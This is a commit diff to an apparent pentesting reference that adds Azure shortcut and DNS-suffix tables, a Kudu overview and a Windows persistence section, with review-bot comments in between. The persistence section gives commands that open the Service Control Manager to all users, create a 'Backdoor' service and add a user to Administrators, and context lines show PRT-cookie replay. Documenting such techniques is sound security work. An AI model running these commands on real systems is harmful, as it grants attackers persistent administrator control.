aka.ms + Kudu + Azure Services + Service Security Descriptor

pull/18/head
Swissky 2024-09-14 23:55:18 +02:00
parent 235dcaf882
commit bf3c6c4875
7 changed files with 214 additions and 8 deletions

docs/cloud/azure/aka-ms.md Normal file
View File

@ -0,0 +1,103 @@
# aka.ms Shortcuts
aka.ms is a URL shortening service used by Microsoft. It is commonly employed to create short, easily shareable links that redirect users to longer or more complex URLs, typically related to Microsoft services, products, or resources.
## Azure Active Directory - Admins
|aka.ms|Command|Portal Blade|
|-----|----|---|
|[aka.ms/ad/ca](https://aka.ms/ad/ca)|ca|Conditional Access|
|[aka.ms/ad/cawhatif](https://aka.ms/ad/cawhatif)|cawhatif|Conditional Access What If|
|[aka.ms/ad/pim](https://aka.ms/ad/pim)|pim|Privileged Identity Management|
|[aka.ms/ad/users](https://aka.ms/ad/users)|users|Users|
|[aka.ms/ad/groups](https://aka.ms/ad/groups)|groups|Groups|
|[aka.ms/ad/devices](https://aka.ms/ad/devices)|devices|Devices|
|[aka.ms/ad/apps](https://aka.ms/ad/apps)|apps|Enterprise Applications|
|[aka.ms/ad/appreg](https://aka.ms/ad/appreg)|appreg|Application Registrations|
|[aka.ms/ad/auth](https://aka.ms/ad/auth)|auth|Authentication Methods Policies|
|[aka.ms/ad/legacymfa](https://aka.ms/ad/legacymfa)|legacymfa|Legacy MFA|
|[aka.ms/ad/guests](https://aka.ms/ad/guests)|guests|Guest Access Settings|
|[aka.ms/ad/logs](https://aka.ms/ad/logs)|logs|Sign in Logs|
|[aka.ms/ad/xtap](https://aka.ms/ad/xtap)|xtap|Cross Tenant Access Settings|
|[aka.ms/ad/roles](https://aka.ms/ad/roles)|roles|Azure AD Roles|
|[aka.ms/ad/sspr](https://aka.ms/ad/sspr)|sspr|Password Reset|
|[aka.ms/ad/security](https://aka.ms/ad/security)|security|Security|
|[aka.ms/ad/mfaunblock](https://aka.ms/ad/mfaunblock)|mfaunblock|MFA Unblock|
|[aka.ms/ad/reviews](https://aka.ms/ad/reviews)|reviews|Access Reviews|
|[aka.ms/ad/score](https://aka.ms/ad/score)|score|Secure Score|
|[aka.ms/ad/license](https://aka.ms/ad/license)|license|Licenses|
|[aka.ms/ad/synclog](https://aka.ms/ad/synclog)|synclog|AAD Connect Sync Errors|
|[aka.ms/ad/adfslog](https://aka.ms/ad/adfslog)|adfslog|ADFS Log|
|[aka.ms/ad/consent](https://aka.ms/ad/consent)|consent|Consents and Permissions|
|[aka.ms/ad/support](https://aka.ms/ad/support)|support|Support|
|[aka.ms/ad/list](https://aka.ms/ad/list)|list|List all these shortcuts|
## Microsoft Admin Portals
|aka.ms|Command|Page|
|-----|----|---|
|[aka.ms/admin](https://aka.ms/admin)|admin|[M365 Admin Portal](https://admin.microsoft.com)|
|[aka.ms/azad](https://aka.ms/azad)|azad|[Azure AD Portal](https://portal.azure.com)|
|[aka.ms/ge](https://aka.ms/ge)|ge|[Graph Explorer](https://developer.microsoft.com/graph/graph-explorer)|
|[aka.ms/intune](https://aka.ms/intune)|intune|[Intune](https://endpoint.microsoft.com)|
|[aka.ms/ppac](https://aka.ms/ppac)|ppac|[Power Platform](https://admin.powerplatform.microsoft.com/)|
## Microsoft Intune Portals
|aka.ms|Command|Page|
|-----|----|---|
|[aka.ms/in](https://aka.ms/in)|in|Intune admin center|
|[aka.ms/intuneshd](https://aka.ms/intuneshd)|intuneshd|Intune service health|
|[aka.ms/intunesupport](https://aka.ms/intunesupport)|support|Get Intune Support|
|[aka.ms/enrollmymac](https://aka.ms/enrollmymac)|enrollmymac|Download the Intune Company Portal for Macs|
## Microsoft 365 Defender
|aka.ms|Command|Portal Blade|
|-----|----|---|
|[aka.ms/de](https://aka.ms/de)|de|Microsoft 365 Defender|
|[aka.ms/de/incidents](https://aka.ms/de/incidents)|incidents|Incidents|
|[aka.ms/de/hunting](https://aka.ms/de/hunting)|hunting|Hunting|
|[aka.ms/de/actions](https://aka.ms/de/actions)|actions|Action Center|
|[aka.ms/de/explorer](https://aka.ms/de/explorer)|explorer|Explorer|
## Microsoft User Portals
|aka.ms|Page|
|-----|---|
|[aka.ms/sspr](https://aka.ms/sspr)|Self Service Password Reset|
|[aka.ms/mysecurity](https://aka.ms/mysecurity)|My Security|
|[aka.ms/myapps](https://aka.ms/myapps)|My Apps|
|[aka.ms/my-account](https://aka.ms/my-account)|My Account|
|[aka.ms/my-groups](https://aka.ms/my-groups)|My Groups|
|[aka.ms/my-access](https://aka.ms/my-access)|My Access Packages|
|[aka.ms/mystaff](https://aka.ms/mystaff)|My Access Packages|
|[aka.ms/mfasetup](https://aka.ms/mfasetup)|Alternative for My Security|
## Identity Protection
|aka.ms|Page|
|-----|---|
|[aka.ms/identityprotection](https://aka.ms/identityprotection)|Identity Protection|
## Winget (Windows Package Manager)
|aka.ms|Page|
|-----|---|
|[aka.ms/getwinget](https://aka.ms/getwinget)|Get Winget Installer|
|[aka.ms/winget-docs](https://aka.ms/winget-docs)|Winget Documentation|
|[aka.ms/winget](https://aka.ms/winget)|Winget Packages (Github Repo)|
## Miscellaneous
|aka.ms|Page|
|-----|---|
|[aka.ms/entradeprecations](https://aka.ms/entradeprecations)|Entra/Azure AD related retirements/deprecations|
|[aka.ms/entratemplates](https://aka.ms/entratemplates)|Email templates & posters to roll out Azure Active Directory features|
|[aka.ms/Fileshare Migration](https://aka.ms/odsp-mm-fs)|Fileshare Migration Portal|
## References
* [microsoft/aka - GitHub - microsoftopensource](https://github.com/microsoft/aka)
* [levid0s/AzurePortals - levid0s - 2019](https://github.com/levid0s/AzurePortals)
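Review bot: the `aka.ms/mystaff` row under Microsoft User Portals repeats the label of the row above it, "My Access Packages"; that shortcut opens the My Staff portal, so the cell should read "My Staff". Two smaller consistency points in the same file: `aka.ms/intunesupport` carries `support` in the Command column while every other row mirrors the shortcut name, and the last Miscellaneous row uses link text `aka.ms/Fileshare Migration` for the URL `https://aka.ms/odsp-mm-fs`, so the link text should be `aka.ms/odsp-mm-fs` with "Fileshare Migration Portal" left in the Page column.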

View File

@ -1,4 +1,4 @@
# Azure AD - Tokens # Azure AD - Access and Tokens
## Connection ## Connection
@ -322,7 +322,7 @@ MimiKatz (version 2.2.0 and above) can be used to attack (hybrid) Azure AD joine
* Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>` * Request a nonce from AAD: `roadrecon auth --prt-init -t <tenant-id>`
* Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request. * Use [dirkjanm/ROADtoken](https://github.com/dirkjanm/ROADtoken) or [wotwot563/aad_prt_bof](https://github.com/wotwot563/aad_prt_bof) to initiate a new PRT request.
* `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>` * `roadrecon auth --prt-cookie <prt-cookie> --tokens-stdout --debug` or `roadtx gettoken --prt-cookie <x-ms-refreshtokencredential>`
* Then browse to [login.microsoftonline.com](login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>` * Then browse to [login.microsoftonline.com](https://login.microsoftonline.com) with a cookie `x-ms-RefreshTokenCredential:<output-from-roadrecon>`
```powershell ```powershell
Name: x-ms-RefreshTokenCredential Name: x-ms-RefreshTokenCredential
Value: <Signed JWT> Value: <Signed JWT>

View File

@ -1,4 +1,4 @@
# Azure AD - Azure AD Connect # Azure AD - AD Connect and Cloud Sync
| Active Directory | Azure AD | | Active Directory | Azure AD |
|-----------------------------------|-------------------| |-----------------------------------|-------------------|

View File

@ -30,7 +30,6 @@ Subscriptions:
* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too. * **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
## References ## References
* [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest) * [Az - Permissions for a Pentest - HackTricks](https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-permissions-for-a-pentest)

View File

@ -6,6 +6,7 @@
az webapp list az webapp list
``` ```
## Execute Commands ## Execute Commands
```ps1 ```ps1
@ -19,6 +20,7 @@ Invoke-AzureRMWebAppShellCommand `
-Command "whoami" -Command "whoami"
``` ```
## SSH Connection ## SSH Connection
First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode` First check if the SSH over HTTP connection is enabled: `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode`
@ -29,6 +31,25 @@ az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-g
``` ```
## Kudu
In Azure App Service, Kudu is the advanced management and deployment tool used for various operations such as continuous integration, troubleshooting, and diagnostic tasks for your web applications. It provides a set of utilities and features for managing your apps environment, including access to application settings, log streams, and deployment management.
You can access this Kudu app at the following URLs:
* App not in the Isolated tier: `https://<app-name>.scm.azurewebsites.net`
* Internet-facing app in the Isolated tier (App Service Environment): `https://<app-name>.scm.<ase-name>.p.azurewebsites.net`
* Internal app in the Isolated tier (App Service Environment for internal load balancing): `https://<app-name>.scm.<ase-name>.appserviceenvironment.net`
Key Features of Kudu in App Service:
* **Web-Based Console**: Provides a command-line interface (CLI) to execute commands directly on the App Service environment.
* **File Explorer**: Lets you view and manage files in your apps environment.
* **Environment Diagnostics**: Offers insights into the environment variables, app settings, and detailed diagnostic logs.
* **Process Explorer**: Allows you to monitor and manage running processes in your apps environment.
* **Access to Logs**: Easily view, download, and stream logs for debugging and troubleshooting.
## References ## References
* [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab) * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
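Review bot: "your apps environment" appears three times in the new Kudu section (intro paragraph, File Explorer, Process Explorer) and should be "your app's environment". The feature list also leaves the security relevance implicit: the Web-Based Console executes commands in the App Service environment and the Environment Diagnostics view exposes app settings, so anyone who can authenticate to the `.scm.` host listed above has code execution and can read the application's configuration; one sentence stating that, and that access to the SCM endpoint should be restricted accordingly, would make the point for the reader. Unrelated to this change, the context line `(curl https://${appName}?app.scm.azurewebsites.net/webssh/host).statuscode` in the SSH Connection section has a stray `?app` between the app name and `.scm`.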

View File

@ -0,0 +1,40 @@
# Azure Services - DNS Suffix
## DNS table
Many Azure services generate custom endpoints with a suffix such as `.cloudapp.azure.com`, `.windows.net`. Below is a table of common services and their associated DNS suffixes.
These services can also be leveraged for domain fronting or communication with an external C2 server when they are whitelisted by the proxy or the firewall rules.
| Service | Domain |
| --- | --- |
| Analysis Services Suffix | .asazure.windows.net |
| API Management Suffix | .azure-api.net |
| App Services Suffix | .azurewebsites.net |
| Automation Suffix | .azure-automation.net |
| Batch Suffix | .batch.azure.com |
| Blob Endpoint Suffix | .blob.core.windows.net |
| CDN Suffix | .azureedge.net |
| Data Lake Analytics Catalog Suffix | .azuredatalakeanalytics.net |
| Data Lake Store Suffix | .azuredatalakestore.net |
| DocumentDB/CosmosDB Suffix | .documents.azure.com |
| Event Hubs Suffix | .servicesbus.windows.net |
| File Endpoint Suffix | .file.core.windows.net |
| FrontDoor Suffix | .azurefd.net |
| IoT Hub Suffix | .azure-devices.net |
| Key Vault Suffix | .vault.azure.net |
| Logic App Suffix | .azurewebsites.net |
| Queue Endpoint Suffix | .queue.core.windows.net |
| Redis Cache Suffix | .redis.cache.windows.net |
| Service Bus Suffix | .servicesbus.windows.net |
| Service Fabric Suffix | .cloudapp.azure.com |
| SQL Database Suffix | .database.windows.net |
| Storage Endpoint Suffix | .core.windows.net |
| Table Endpoint Suffix | .table.core.windows.net |
| Traffic Manager Suffix | .trafficmanager.net |
| Web Application Gateway Suffix | .cloudapp.azure.com |
## References
* [Azure services URLs and IP addresses for firewall or proxy whitelisting - Daniel Neumann - 20. December 2016](https://www.danielstechblog.io/azure-services-urls-and-ip-addresses-for-firewall-or-proxy-whitelisting/)
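Review bot: the Event Hubs and Service Bus rows give the suffix as `.servicesbus.windows.net`; the namespace suffix is `.servicebus.windows.net` (single "s"), and a reader who copies these rows into a proxy or firewall allow list would match nothing. On the sentence about whitelisted services being usable for domain fronting or C2: for the defender reading this, the same table is a list of suffixes an egress policy should not wildcard, since a blanket allow of `*.azurewebsites.net` or `*.blob.core.windows.net` is exactly what makes them usable for that purpose; scoping allow rules to the tenant's own hostnames is the mitigation, and a short remark to that effect would balance the paragraph.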

View File

@ -19,10 +19,11 @@
* [Windows Service](#windows-service) * [Windows Service](#windows-service)
* [Elevated](#elevated) * [Elevated](#elevated)
* [Registry HKLM](#registry-hklm) * [Registry HKLM](#registry-hklm)
* [Winlogon Helper DLL](#) * [Winlogon Helper DLL](#winlogon-helper-dll)
* [GlobalFlag](#) * [GlobalFlag](#globalflag)
* [Startup Elevated](#startup-elevated) * [Startup Elevated](#startup-elevated)
* [Services Elevated](#services-elevated) * [Services Elevated](#services-elevated)
* [Service Security Descriptor](#servicesecuritydescriptor)
* [Scheduled Tasks Elevated](#scheduled-tasks-elevated) * [Scheduled Tasks Elevated](#scheduled-tasks-elevated)
* [Binary Replacement](#binary-replacement) * [Binary Replacement](#binary-replacement)
* [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp) * [Binary Replacement on Windows XP+](#binary-replacement-on-windows-xp)
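Review bot: the new TOC entry links to `#servicesecuritydescriptor` because the heading it targets is written `### ServiceSecurityDescriptor`; every sibling entry uses a spaced heading (`Services Elevated`, `Scheduled Tasks Elevated`), so the heading should be `### Service Security Descriptor` and this link `#service-security-descriptor` to keep the style consistent.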
@ -321,7 +322,7 @@ Create a service that will start automatically or on-demand.
```powershell ```powershell
# Powershell # Powershell
New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic
sc start pentestlab sc start Backdoor
# SharPersist # SharPersist
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add
@ -331,6 +332,46 @@ sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj="
sc start Backdoor sc start Backdoor
``` ```
### ServiceSecurityDescriptor
Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL to the service control manager with sdset.
**Exploit**:
```ps1
sc.exe sdset <ServiceName> <ServiceSecurityDescriptor>
```
The following command grants full control (`Key Access`) over the Service Control Manager to all users (represented by `WD`, which stands for "World"). In other words, it allows any user to start, stop, modify, or control services through the Service Control Manager, which can be a security risk as it opens service management to everyone on the system.
```ps1
sc.exe sdset scmanager D:(A;;KA;;;WD)
```
* `sc.exe`: The Service Control (sc) command is a Windows utility used for managing services.
* `sdset`: This option sets a Security Descriptor (SD) for a service or the Service Control Manager itself. A security descriptor defines permissions and access rights to system resources.
* `scmanager`: This is the target, referring to the Service Control Manager, which manages the services in the system.
The `ServiceSecurityDescriptor` is defined using the Service Descriptor Definition Language (SDDL).
List the permissions for `scmanager`
```ps1
sc.exe sdshow scmanager
```
Alternatively, you can use [zacateras/sddl-parser](https://github.com/zacateras/sddl-parser) to understand the Security Descriptor Definition Language (SDDL), e.g: `./Sddl.Parser.Console.exe "O:BAG:BAD:(A;CI;CCDCRP;;;NS)"`.
Abuse the weaken configuration to create a service that grants administrator privilege to a custom user `user_basic`.
```ps1
sc create LPE displayName= "LPE" binPath= "C:\Windows\System32\net.exe localgroup Administrators user_basic /add" start= auto
```
Then you need to wait for a reboot for the service to automatically start and grant the user with elevated privilege or any persistence mechanism you specified in the `binPath`.
### Scheduled Tasks Elevated ### Scheduled Tasks Elevated
Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day. Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day.
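Review bot: the opening sentence of the ServiceSecurityDescriptor section does not parse ("Allow any arbitrary non-administrative user to have full SYSTEM permissions on a machine persistently by feeding an overly permissive ACL ... with sdset"); suggest "Setting an overly permissive security descriptor on the Service Control Manager with `sc.exe sdset` gives any non-administrative user persistent, SYSTEM-equivalent control of the machine." In the paragraph explaining `D:(A;;KA;;;WD)`, "full control (`Key Access`)" is misleading: `KA` is the SDDL all-access right (KEY_ALL_ACCESS), so "full control (`KA`, the SDDL all-access right)" is the accurate wording. Two more grammar fixes: "Abuse the weaken configuration" should be "Abuse the weakened configuration", and "grant the user with elevated privilege" should be "grant the user elevated privileges". Finally, `sc.exe sdshow scmanager` is presented only as a way to read the current value; since this is a persistence page, it is worth one sentence saying that an ACE granting `KA` to `WD` in that output is the indicator a defender should look for, and that the descriptor should be compared against the output of a clean host and restored when it differs.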
@ -580,3 +621,5 @@ Set-DomainObject -Identity <target_machine> -Set @{"ms-mcs-admpwdexpirationtime"
* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) * [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) * [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html)
* [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/)
* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11))